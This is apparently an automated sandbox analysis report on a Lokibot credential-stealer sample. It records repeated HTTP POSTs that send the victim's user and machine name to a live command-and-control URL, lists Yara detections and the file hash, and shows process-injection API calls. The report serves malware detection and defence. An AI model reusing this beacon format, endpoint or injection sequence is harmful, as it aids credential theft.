                                          83192.168.2.449854203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:51.621969938 CET6274OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:51.967381954 CET6274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:52.342394114 CET6275INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          84192.168.2.449855203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:52.907812119 CET6275OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:53.244462967 CET6276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:53.614855051 CET6276INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          85192.168.2.449856203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:54.200424910 CET6277OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:54.545985937 CET6277OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:54.924731016 CET6277INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          86192.168.2.449857203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:55.486345053 CET6278OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:55.825711966 CET6279OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:56.190764904 CET6279INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          87192.168.2.449858203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:56.748662949 CET6280OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:57.082882881 CET6280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:57.456227064 CET6281INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.449756203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:14.755155087 CET1546OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:15.090272903 CET1546OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:15.458630085 CET1547INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: Conan Fegan - Aluminium.exe PID: 4748 Parent PID: 5836

                                          General

                                          Start time:19:12:51
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                                          Imagebase:0x960000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: Conan Fegan - Aluminium.exe PID: 7008 Parent PID: 4748

                                          General

                                          Start time:19:12:59
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Imagebase:0xc20000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: Conan Fegan - Aluminium.exe PID: 4748 Parent PID: 5836 Conan Fegan - Aluminium.exeCOMMON

                                            Executed Functions

                                            Function 07A30040, Relevance: 4.6, Strings: 3, Instructions: 892COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: D0l$D0l$D0l
                                            • API String ID: 0-1921109830
                                            • Opcode ID: da1bfc36be05c938ef7120cbc5f7efd8863b9aa4100cf448e6cab460cd5a60d7
                                            • Instruction ID: 225acde784ac39337399dbc96ce4417c1b97eead1521fe03ab753772b4c50d42
                                            • Opcode Fuzzy Hash: da1bfc36be05c938ef7120cbc5f7efd8863b9aa4100cf448e6cab460cd5a60d7
                                            • Instruction Fuzzy Hash: 0F726BB0A002199FDB14DFA9D994BAEBBB3FF89304F158069F415AB361DB34D841CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3C5FF, Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12d9d10ab6bb43df7d760db0488a2d8d360c9afb5f96e458a264cd58b3d9c7c2
                                            • Instruction ID: a0647ebaca27a7f6012732e8d9a960699b318c2c0f4b46320294fcffc13fb8dc
                                            • Opcode Fuzzy Hash: 12d9d10ab6bb43df7d760db0488a2d8d360c9afb5f96e458a264cd58b3d9c7c2
                                            • Instruction Fuzzy Hash: 78B18FB5A00215CFCB14CF69C984AADBBB1BF84721F168059F825AB3A1DB30ED45CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A38DF8, Relevance: .2, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 946994a1f2cb5e3afad0d2dc1630e8013362fe45d4741246d7a987d224a95820
                                            • Instruction ID: 5cfc88a4c12c099a56d1056bbbe258f762ff3c40296415fce20014a86fd89f89
                                            • Opcode Fuzzy Hash: 946994a1f2cb5e3afad0d2dc1630e8013362fe45d4741246d7a987d224a95820
                                            • Instruction Fuzzy Hash: A8A1F3B4E04249CFDB14DFA9C48469EFBF2AF89314F25C129E428AB345D7389981CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A38DEA, Relevance: .2, Instructions: 182COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cc17745fb5d55f2ceb9a04352f6fcf76b6c6c68b560701f31d36cb2ee3979be
                                            • Instruction ID: 17b54e1aa1cafe370ac2b68a1fbae4f3146ebe81775019bf6249a61d36d1be30
                                            • Opcode Fuzzy Hash: 7cc17745fb5d55f2ceb9a04352f6fcf76b6c6c68b560701f31d36cb2ee3979be
                                            • Instruction Fuzzy Hash: 667118B4E04249CFDB14DFA9C48469EBBF2AF89314F24C12AE428AB345D7389945CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3C1FF, Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 11128a4b85ec308721a5e39130255c3f364af2748dae66348a2b947c912d1f27
                                            • Instruction ID: 2b9e5c833d382f0d595b6e2bda0c417d9732ad052d4fe687115515af0b897778
                                            • Opcode Fuzzy Hash: 11128a4b85ec308721a5e39130255c3f364af2748dae66348a2b947c912d1f27
                                            • Instruction Fuzzy Hash: BE4102B4910269CFDB64DF64C884BECB7B1EB8A314F0081EAD419AB291DB349EC5CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3DE28, Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b167bc9e5df778756621b981ce35a1c494b6d04d4ac1569e09c0bba027ee60c
                                            • Instruction ID: f76bc501f34b3c77b99b3e12f01dd57c85c955180b3ec2dab6c186030ee14fc2
                                            • Opcode Fuzzy Hash: 1b167bc9e5df778756621b981ce35a1c494b6d04d4ac1569e09c0bba027ee60c
                                            • Instruction Fuzzy Hash: 18219CB5904248CFCB05DFA4C554BEDBFF1AF4E311F14916AE054B72A1C7398944CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3DF24, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3759762f19f10bb4a39161421616f9f41aa3c725b4a556376edc79db27f3fd7c
                                            • Instruction ID: 84a29bdfb38b2ac7f7b7064a444b9163e14c51a6a6dd25d76d16beb363cefe6d
                                            • Opcode Fuzzy Hash: 3759762f19f10bb4a39161421616f9f41aa3c725b4a556376edc79db27f3fd7c
                                            • Instruction Fuzzy Hash: 9BE068E1E4C395DFD7014FB488A56BABFB0AB0B205F24518AF091F71A1C2A8C901C762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A8CC, Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A3AB0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: a514932505c90372560ef6a4fd9f12b3ca3aa5f1ba51fcbc0310c409148a5929
                                            • Instruction ID: 7a283c7a5e7a4238c083f633eb4e4bb5826fd80d957d36a50a6b129287df7dc9
                                            • Opcode Fuzzy Hash: a514932505c90372560ef6a4fd9f12b3ca3aa5f1ba51fcbc0310c409148a5929
                                            • Instruction Fuzzy Hash: E0A16CB1D00229CFDB10CFA5C841BDDBBB2BF88314F1585A9F859A7250DB749981CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A8D8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A3AB0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cc2d8eb7726e706a1ab3f7b61fb2ddcaff38a93d66a45e3370f8f35750e2d1cc
                                            • Instruction ID: 6ba53ad5a6d43f91958d31a7017b8a1d3d07ec15932ea2cbfd207cfca7d8e42f
                                            • Opcode Fuzzy Hash: cc2d8eb7726e706a1ab3f7b61fb2ddcaff38a93d66a45e3370f8f35750e2d1cc
                                            • Instruction Fuzzy Hash: 77916CB1D0022ACFDB10CFA5C841BDDBBB2BF88314F1585A9F859A7250DB749985CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A619, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A3A6B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b4b5135d328bbdab56027365fd8b0a047268c55ae5b7512787f1abe1ba676362
                                            • Instruction ID: 06155e4ca3e2d406b5fe1fd59bff9ec0e8b4feb42407259a62a5991b4616a3ef
                                            • Opcode Fuzzy Hash: b4b5135d328bbdab56027365fd8b0a047268c55ae5b7512787f1abe1ba676362
                                            • Instruction Fuzzy Hash: 902148B59003599FCB10CFA9C8847EEBBF5FF48314F10842AE958A7250DB789954CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A620, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A3A6B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 8325d51a073c2bd4c4196d931fa3ce4e8fb5d35a11769b8096451a4543abd6ae
                                            • Instruction ID: 772c3e8ab732f1a5b988d3b12c4b3e425e9c42dd9c688f8f9cf7f985b5fa445a
                                            • Opcode Fuzzy Hash: 8325d51a073c2bd4c4196d931fa3ce4e8fb5d35a11769b8096451a4543abd6ae
                                            • Instruction Fuzzy Hash: 152127B59003599FCB10CFA9C884BEEBBF5FF48314F10842AE959A7250CB789954CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A738, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A3A7C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: f40357a276d4a34206842b4888e552b10fd6e270e49961552244abcc07d55275
                                            • Instruction ID: b58277eb3d3a6c2591d575abbf4670b924f59e143a2dc33e8cf8f16b2068ec68
                                            • Opcode Fuzzy Hash: f40357a276d4a34206842b4888e552b10fd6e270e49961552244abcc07d55275
                                            • Instruction Fuzzy Hash: D62139B19003599FCB10CFA9C8847EEBBB4FF48310F10842AE558A7250C7789940DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A480, Relevance: 1.6, APIs: 1, Instructions: 66threadinjectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 07A3A506
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: 603ca60220abf30b1b46c86107aeff7ccd139756ba5a971d3be921438aa00b9a
                                            • Instruction ID: c30ac2668255a910f675e4e278ca92f384dc8c7eeee59ad3b6eabdb9089de1b4
                                            • Opcode Fuzzy Hash: 603ca60220abf30b1b46c86107aeff7ccd139756ba5a971d3be921438aa00b9a
                                            • Instruction Fuzzy Hash: 91213DB1D003199FDB10CFA9C4457EEBBF4EF48314F14842AE959A7240DB789944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A740, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A3A7C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 50f6526f25c45c97ef0a7fa94f92c915809ce8a95c4e16f2230b2d440b161ae1
                                            • Instruction ID: 8427fa443030b5ef38ecd475cdc32a167bc53f7dd6775251c7815a1e22f251e1
                                            • Opcode Fuzzy Hash: 50f6526f25c45c97ef0a7fa94f92c915809ce8a95c4e16f2230b2d440b161ae1
                                            • Instruction Fuzzy Hash: BB2128B19003599FCB10DFAAC880BEEBBF5FF48314F10842AE958A7250D7789940DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A488, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 07A3A506
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: aa8b5da581f62262aa2a554c3c99aa272885fb3a582dca99f849b99432f93e79
                                            • Instruction ID: ac6cfd13e15240366103d32b292b856fb49d21d685efb99da038f77c8fbee14d
                                            • Opcode Fuzzy Hash: aa8b5da581f62262aa2a554c3c99aa272885fb3a582dca99f849b99432f93e79
                                            • Instruction Fuzzy Hash: DB214CB1D003199FDB10CFAAC4847EEBBF4EF88314F14842AE559A7240DB789944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A560, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A3A5CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 4ec1eb026d079e8bc524f62be0ea6d21f9dc817a51eddd2f3a2a60d23486001a
                                            • Instruction ID: 4660388a78f53e116bf869080a76cac53f3cb0de8e0e7316afcdbe9f12641873
                                            • Opcode Fuzzy Hash: 4ec1eb026d079e8bc524f62be0ea6d21f9dc817a51eddd2f3a2a60d23486001a
                                            • Instruction Fuzzy Hash: 19113A719002599FDB10CFA9C844BDFBBF5AF88324F14841AE555A7250C7799550CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A558, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A3A5CE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: eecfa682abd80665cbc93fe78976f768a3ce7e491bacc30c02eddf85d5b7d7a8
                                            • Instruction ID: 4a995a3a7854419723ea6385b321b4406ca4e10633d9c6b0dc52bf79c4b132e9
                                            • Opcode Fuzzy Hash: eecfa682abd80665cbc93fe78976f768a3ce7e491bacc30c02eddf85d5b7d7a8
                                            • Instruction Fuzzy Hash: 94116A71900249DFDB10CFA9C844BEFBBF5BF88314F14881AE555A7210C7799950CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 07A3A3D0, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.655004088.0000000007A30000.00000040.00000001.sdmp, Offset: 07A30000, based on PE: false
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 4c567c787e8091813ca0b358b337a485065bd6c83935e6097c8cf9605c43e65f
                                            • Instruction ID: 618409a8df4128d13d59a215b2fbbe12996bf80e575e0afcf725b011cb6ccf67
                                            • Opcode Fuzzy Hash: 4c567c787e8091813ca0b358b337a485065bd6c83935e6097c8cf9605c43e65f
